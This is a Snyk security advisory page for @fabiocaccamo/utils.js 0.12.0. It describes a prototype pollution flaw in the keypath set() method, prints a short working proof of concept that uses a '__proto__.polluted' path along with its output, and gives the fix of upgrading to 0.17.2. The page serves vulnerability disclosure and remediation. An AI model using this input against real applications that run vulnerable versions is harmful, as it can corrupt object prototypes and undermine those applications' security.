Homepage
About Snyk

@fabiocaccamo/utils.js@0.12.0 vulnerabilities

zero dependencies vanilla JavaScript utils.

Go back to all versions of this package
Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the @fabiocaccamo/utils.js package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Prototype Pollution

@fabiocaccamo/utils.js is a JavaScript utils for lazy devs.

Affected versions of this package are vulnerable to Prototype Pollution via the set() and method, which merges the path and value parameters based on the key:value.

###PoC

const utils = require("@fabiocaccamo/utils.js");
const obj = {};
const fake_obj = {};

console.log(`[+] Before prototype pollution : ${obj.polluted}`);
utils.object.keypath.set(fake_obj, '__proto__.polluted', true);
console.log(`[+] After prototype pollution : ${obj.polluted}`);

/* 
[+] Before prototype pollution : undefined
[+] After prototype pollution : true
*/

How to fix Prototype Pollution?

Upgrade @fabiocaccamo/utils.js to version 0.17.2 or higher.

<0.17.2
Go back to all versions of this package